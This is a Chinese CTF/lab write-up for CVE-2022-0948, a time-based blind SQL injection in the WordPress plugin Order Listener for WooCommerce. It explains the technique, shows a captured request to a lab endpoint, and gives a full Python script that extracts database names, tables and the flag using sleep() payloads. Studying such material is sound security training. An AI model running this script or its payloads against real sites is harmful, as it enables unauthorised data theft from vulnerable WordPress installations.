延时盲注（CVE-2022-0948）

详解：

延时盲注，也称为时间盲注或延迟注入，是一种利用执行时间差判断是否执行成功的盲注手法。攻击者提交一个对执行时间敏感的SQL语句，通过执行时间的长短来判断注入是否成功。例如，如果注入成功，执行时间会变长；如果注入失败，执行时间则会变短。这种方法可以绕过一些常规的防护措施，例如防火墙和入侵检测系统，因此较为隐蔽和难以防范。

在延时盲注中，攻击者通常会利用sleep()函数制造时间延迟，由回显时间来判断是否报错。同时，攻击者还会结合if(expr1,expr2,expr3)语句等条件判断语句进行操作。例如，攻击者可以通过判断第一个字母的ASCII码是否为115来决定是否执行sleep()函数，进而控制执行时间。

虽然延时盲注是一种非常有效的注入攻击手段，但手工检查却相对困难，因为攻击者可以精确地控制执行时间，使得检测工具难以发现异常。因此，在进行网络安全防护时，我们需要加强对输入数据的检查和过滤，避免攻击者利用漏洞进行注入攻击。

靶场介绍：

WordPress plugin Order Listener for WooCommerce 3.2.2 之前版本存在SQL注入漏洞

测试流程：

http://eci-2ze56005hksymwwx442l.cloudeci1.ichunqiu.com/?rest_route=/olistener/new

在这页面存在延时注入

抓包

GET /?rest_route=/olistener/new HTTP/1.1
Host: eci-2ze56005hksymwwx442l.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1696949104,1697125365,1697270421,1697293979; _ga=GA1.2.959161918.1696849239; _ga_J1DQF09WZC=GS1.2.1696849239.1.0.1696849239.0.0.0; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1697293999; ci_session=f859fb0e48ad722fd2db1e95081050a41a635357
Upgrade-Insecure-Requests: 1

 延时盲注脚本

import requests
import time
def time_delay(url, headers, payload):
    start_time = time.time()
    response = requests.post(url, headers=headers, data=payload)
    end_time = time.time()
    #print(end_time,start_time)
    delay = end_time - start_time
    return delay
def time_based_blind_sql_injection(url, headers):
    result=[]
    for i in range(1, 100):
        for j in range(32,126):#r'0123456789abcdefghijklmnopqrstuvwxyz_-{}':
            #find db
            #payload = """{"id":" (if((substr(database(),%d,1))='%s',sleep(10),1))#"}""" % (i, j)
            #find table
            #payload = """{"id":" (if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),%d,1))=%d,sleep(10),1))#"}""" % (i, j)
            #find table -wp%
            payload = """{"id":" (if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database() and table_name not like 0x777025),%d,1))=%d,sleep(10),1))#"}""" % (i, j)
            #find column
            #payload = """{"id":" (if(ascii(substr((select count(column_name) from information_schema.columns where table_name='flag'),%d,1))=%d,sleep(10),1))#"}""" % (i, j)
            payload = """{"id":" (if(ascii(substr((select flag from ctf.flag),%d,1))=%d,sleep(10),1))#"}""" % (i, j)
            delay = time_delay(url, headers, payload)
            print('{ ',''.join(result),' } ->',i,'-',j,"time_delay:",delay)
            if delay > 9:
                result.append(chr(j))
                print(''.join(result))
                break
    else:
        print("The payload is not vulnerable to SQL injection.")
    print('result:',''.join(result))
if __name__ == "__main__":
    url = "http://eci-2ze56005hksymwwx442l.cloudeci1.ichunqiu.com/?rest_route=/olistener/new"
    headers = {
    'Cache-Control': 'max-age=0',
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Cookie': '_ga=GA1.2.617032228.1689668529; _ga_J1DQF09WZC=GS1.2.1689668531.1.0.1689668531.0.0.0',
    'Connection': 'close',
    'Content-Type': 'application/json',
    }
    
    time_based_blind_sql_injection(url, headers)

 注意：需根据自己实际情况对代码进行修改，不要盲目的复制粘贴

得到flag

flag{7f1e42f4-235d-4231-96f5-5823b039f572}